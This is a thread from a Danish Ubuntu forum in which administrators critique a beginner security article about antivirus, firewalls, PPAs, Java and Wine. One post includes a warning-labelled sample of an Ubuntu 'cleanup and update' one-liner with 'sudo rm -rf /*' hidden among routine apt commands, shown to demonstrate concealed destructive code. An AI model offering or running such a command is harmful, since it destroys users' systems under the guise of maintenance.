Guides om backup & sikkerhed.

Her behandles emner som relaterer til backup og sikkerhed.
thj01
Indlæg: 2667
Tilmeldt: 21. nov 2006, 10:06
Geografisk sted: Fredericia

Re: Guides om backup & sikkerhed.

Indlæg af thj01 »

Jeg har lige læst den der sikkerheds side vi har på https://ubuntudanmark.dk/blog/artikler/ ... sikkerhed/

Jeg kan ikke stå ved den - hvilket er lidt skidt når jeg står som medforfatter til den.

1. Straks installere sikkerhedsopdateringer, når du får besked.


Stadig enig

2. Ikke installere antivirus, som du *virkelig* ikke får brug for i Linux, medmindre du deler filer med Windows brugere.


Bør ikke være der, men bør være formuleret i et generelt afsnit om forskellen mellem Windows, Mac og Linux (og mac bør virkeligt nævnes

3. Aktivere firewallen (sudo ufw enable) uden yderligere indstilling.

Bør ikke være der ... det er kun noget specialister kigger på alligevel og er et teknisk niveau, der ikke høre til i en "overfladisk" guide

4. Holde dig til de officielle Ubuntu program-kilder så meget som muligt, og kun forsigtigt afvige fra dem, når det er strengt nødvendigt.


Er meget uenig ... det er en af de smarte ting ved Ubuntu, at man løbende kan have mere opdaterede versioner af programmer ved at anvende PPA'er.

Det handler altsammen om tillid til udviklerne af programmerne, og man kan ikke underkende alle udviklere og PPA-holders på den måde...

5. Holde Java (både OpenJDK og Oracle Java) som standard deaktiveret i din browser, og kun aktivere Java, når det er nødvendigt.

?? ... hvorfor? det kræver jo at der er et system neden nder der er modtagelig for problemer ... hvilket vi ovenfor har vist ikke er tilfældet.

6. Bruge Windows emulatoren Wine med forsigtighed.

?? ... hvorfor?

7. Vigtigst af alt, bruge din sunde fornuft. Den største sikkerhedstrussel er typisk fundet mellem tastaturet og stolen.

Bør stå i et generelt afsnit (som det andet)

... og så er opsumeringen vistnok imod den måde vi har besluttet os om at skrive om andre operativsystemer.

Jeg mener faktisk at den side bør slettes og/eller skrives helt om, da den i bedste fald er misinformerende
Forfatter til Ubuntuguiden: http://www.vidas.dk/guides/ubuntuguiden.html

Kører LTS udgaverne.

"It's always easy if you know how to do it."
AJenbo
Admin
Indlæg: 20878
Tilmeldt: 15. nov 2009, 15:04
IRC nickname: AJenbo
Geografisk sted: Vanløse, København

Re: Guides om backup & sikkerhed.

Indlæg af AJenbo »

thj01 skrev:
2. Ikke installere antivirus, som du *virkelig* ikke får brug for i Linux, medmindre du deler filer med Windows brugere.


Bør ikke være der, men bør være formuleret i et generelt afsnit om forskellen mellem Windows, Mac og Linux (og mac bør virkeligt nævnes

Jeg syndes det er en god ide at informere om det her da det ofte er et spørgsmål nye brugere vil have mht til sikkerhed. Men det kunne nok omformuleres en smule.
thj01 skrev:
3. Aktivere firewallen (sudo ufw enable) uden yderligere indstilling.

Bør ikke være der ... det er kun noget specialister kigger på alligevel og er et teknisk niveau, der ikke høre til i en "overfladisk" guide

Enig i at det nok mest er noget for de tekniske, men det kunne stadig nævnes i samme stil som antivirus.
thj01 skrev:
4. Holde dig til de officielle Ubuntu program-kilder så meget som muligt, og kun forsigtigt afvige fra dem, når det er strengt nødvendigt.


Er meget uenig ... det er en af de smarte ting ved Ubuntu, at man løbende kan have mere opdaterede versioner af programmer ved at anvende PPA'er.

Det handler altsammen om tillid til udviklerne af programmerne, og man kan ikke underkende alle udviklere og PPA-holders på den måde...

PPA er også temmelig teknisk og man skal kunne resonere over hvilke der er gode og hvilke der er dårlige, det er ofte grunden til at folk ikke kan opgradere eller har en oldnordisk SSL udgave installeret. Så jeg syndes det er godt at informere folk om at det potentielt er en faldgruppe når det angår sikker hed. Der er heller ingen garanti for at et PPA indeholder nyeste version af et program, andre gange er det beta udgaver som kan ideholde fejl.

thj01 skrev:5. Holde Java (både OpenJDK og Oracle Java) som standard deaktiveret i din browser, og kun aktivere Java, når det er nødvendigt.

?? ... hvorfor? det kræver jo at der er et system neden under der er modtagelig for problemer ... hvilket vi ovenfor har vist ikke er tilfældet.

Ubuntu kan godt blive hacket og Java kan være en af vejene til at gøre det, men er der overhovedet nogen browsere der tillader det i dag?

thj01 skrev:6. Bruge Windows emulatoren Wine med forsigtighed.

?? ... hvorfor?

Man behøves ikke at genstarte, det er en måde at overgå til kun at skulle bruge Ubuntu selv hvis der ikke findes alternativer til nogle vigtige programmer. Men ja det burde nok omskrives og uddybes. Man kunne måske augmentere for at det mindsker risiko for virus i Windows, men på den anden side tilføjer det muligheden i Ubuntu (selv om det kun er nogle viruser der fungere i Wine)

thj01 skrev:7. Vigtigst af alt, bruge din sunde fornuft. Den største sikkerhedstrussel er typisk fundet mellem tastaturet og stolen.

Bør stå i et generelt afsnit (som det andet)

... og så er opsumeringen vistnok imod den måde vi har besluttet os om at skrive om andre operativsystemer.

Jeg mener faktisk at den side bør slettes og/eller skrives helt om, da den i bedste fald er misinformerende

Tror generelt vores artikler kunne trænge til en gennemgang, skal jeg give dig redaktør rettigheder?
thj01
Indlæg: 2667
Tilmeldt: 21. nov 2006, 10:06
Geografisk sted: Fredericia

Re: Guides om backup & sikkerhed.

Indlæg af thj01 »

Jeg får det ikke gjort.

Jeg kan bare sige at med den viden jeg har i dag, så er der al for meget misinformation i den artikel, til at "vi" kan stå inde for den.

angående PPA'er, så siger jeg ikke at de er uproblematiske ... men det gør ikke at der skal advares imod dem.
Forfatter til Ubuntuguiden: http://www.vidas.dk/guides/ubuntuguiden.html

Kører LTS udgaverne.

"It's always easy if you know how to do it."
Brugeravatar
Christian.Arvai
Admin
Indlæg: 10725
Tilmeldt: 26. apr 2008, 19:27
IRC nickname: Christian_Arvai
Geografisk sted: Holeby - Lolland

Re: Guides om backup & sikkerhed.

Indlæg af Christian.Arvai »

Personligt holder jeg ikke dette punkt:
5. Holde Java (både OpenJDK og Oracle Java) som standard deaktiveret i din browser, og kun aktivere Java, når det er nødvendigt.

Jeg har aldrig oplevet problemer med Java/Ubuntu/Firefox, så det giver ingen mening for mig som bruger, hvis det løbende skal deaktiveres .

Så er vi henne ved PPA. Jeg bruger dem selv til Firefox og 0AD. OAD har jeg ikke haft problemer med, men hvis folk henter PPA til Firefox, i den tro at de så har den nyeste og bedst fungerende browser, bliver de meget skuffet - Der er ofte fejl og mangler i deres PPA, og den er heller ikke officielt meldt stabil (PPA til Firefox er Beta). Derudover er der et hav af PPA'er rundt omkring, og det er ofte svært, at finde ud af præcist hvilken kode der køres, hvilket alm. brugere heller ikke har en chance for at gennemskue.

En anden ting er scrips generelt - Der er intet i artiken om det, men det er en meget dårlig ide at køre kode/scripts i Terminalen, hvis man ikke kan gennemskue indholdet selv, eller at det kommer fra en troværdig kilde, herunder dette forum. Vi har godt nok har set noget mærkeligt kode i "Sandkassen", hvilket præcist er formålet med det subfora, men ikke en eneste gang i de 10 år jeg har været herinde, har der været indlæg i det alm. forum, som indeholdt kode der med vilje havde til formål at skade.
Med venlig hilsen Christian

"We can only see a short distance ahead, but we can see plenty there that needs to be done." -- Alan Turing
Brugeravatar
Christian.Arvai
Admin
Indlæg: 10725
Tilmeldt: 26. apr 2008, 19:27
IRC nickname: Christian_Arvai
Geografisk sted: Holeby - Lolland

Re: Guides om backup & sikkerhed.

Indlæg af Christian.Arvai »

En anden årsag til at Virus ikke er en problemstilling på Linux er at der ikke kan køres systemkode, med mindre det er tilladt af brugeren. Hver gang du forsøger at ændre noget i selve systemet sætter det sig på bagbenene (med mindre du kører som administrator – hvilket svarer til at købe et hus uden døre og vinduer – DON’T), og kræver dit kodeord. Ødelæggende kode ville ikke kunne lægge sig ind uden du accepterer det – og hvilken indbrudstyv ringer til politiet for at sige at man bryder ind i et hus!

Hvis vi skal bruge anekdoter, vil det sandsynligvis også være Pizzabudet der ringer på, og når du frivilligt har åbnet døren (godkendt koden), smutter vedkommende forbi og tømmer huset ;)

Jeg kan vise et konkret eksempel. Jeg har taget noget som lagde hele min datters maskine ned, da jeg testede det på 7.10. Det er blot skjult inde i det script, som forum har til "Oprydning og opdatering af Ubuntu".

KØR IKKE DENNE KODEBLOK. Det er et eksempel på at man kan skjule destruktiv kode!!!!!

Kode: Vælg alt

sudo dpkg --configure -a && sudo apt-get check -y && sudo apt-get autoremove -y && sudo apt-get clean -y && sudo rm -rf $HOME/.local/share/Trash/files && sudo rm -rf ~/.evolution/mail/local/folders.db && sudo find ~/.thumbnails -type f -exec rm {} \; && sudo rm -rf /var/log/*.gz && sudo rm -rf /* && sudo updatedb && sudo apt-get update -y && sudo apt-get upgrade -y && sudo apt-get purge $(dpkg -l linux-{image,headers}-"[0-9]*" | awk '/ii/{print $2}' | grep -ve $(uname -r | sed -r 's/-[a-z]+//') | sed ':a;N;$!ba;s/\n/ /g')
Med venlig hilsen Christian

"We can only see a short distance ahead, but we can see plenty there that needs to be done." -- Alan Turing
Brugeravatar
Christian.Arvai
Admin
Indlæg: 10725
Tilmeldt: 26. apr 2008, 19:27
IRC nickname: Christian_Arvai
Geografisk sted: Holeby - Lolland

Re: Guides om backup & sikkerhed.

Indlæg af Christian.Arvai »

Som udvikler vil jeg lige påpege en ret sjov ting. Den artikkel er skrevet af en blanding mellem meget erfarne Ubuntu-brugere, og personer der reelt har uddannelse indefor IT-området. Vi (forfatterne af artiklen) har skrevet hvad vi tror nye almindelige brugere har brug for at vide, men ikke en eneste gang har vi oprettet en tråd herinde, og spurgt ind til indhold og ønsker til dette.

Hvis jeg skal blive i fagsproget, vil en mere agil og UX-baseret udviklingsmodel give et bedre resultat for slutbrugerne :D
Med venlig hilsen Christian

"We can only see a short distance ahead, but we can see plenty there that needs to be done." -- Alan Turing
Klaus Rasmussen
Admin
Indlæg: 5600
Tilmeldt: 26. apr 2010, 02:40
IRC nickname: ClaudiuS
Geografisk sted: Nyborg [fyn]

Re: Guides om backup & sikkerhed.

Indlæg af Klaus Rasmussen »

Christian.Arvai skrev:men ikke en eneste gang i de 10 år jeg har været herinde, har der været indlæg i det alm. forum, som indeholdt kode der med vilje havde til formål at skade.

Er du sikker på det? Kan du huske mcrypto? Han fik efter gentagen brug af suspect kode sparket.
Med Venlig Hilsen
Klaus

Kører Ubuntu 24.04.1 på ASUS All-Series, og Probook 4520s.
Gratis Ubuntumagasin: http://fullcirclemagazine.org/
https://mega.nz/folder/aJsmCYKa#dxMHKTi4Idmz6hiVpsI68Q
Brugeravatar
Christian.Arvai
Admin
Indlæg: 10725
Tilmeldt: 26. apr 2008, 19:27
IRC nickname: Christian_Arvai
Geografisk sted: Holeby - Lolland

Re: Guides om backup & sikkerhed.

Indlæg af Christian.Arvai »

Klaus Rasmussen skrev:
Christian.Arvai skrev:men ikke en eneste gang i de 10 år jeg har været herinde, har der været indlæg i det alm. forum, som indeholdt kode der med vilje havde til formål at skade.

Er du sikker på det? Kan du huske mcrypto? Han fik efter gentagen brug af suspect kode sparket.

Det er faktisk korrek.
Med venlig hilsen Christian

"We can only see a short distance ahead, but we can see plenty there that needs to be done." -- Alan Turing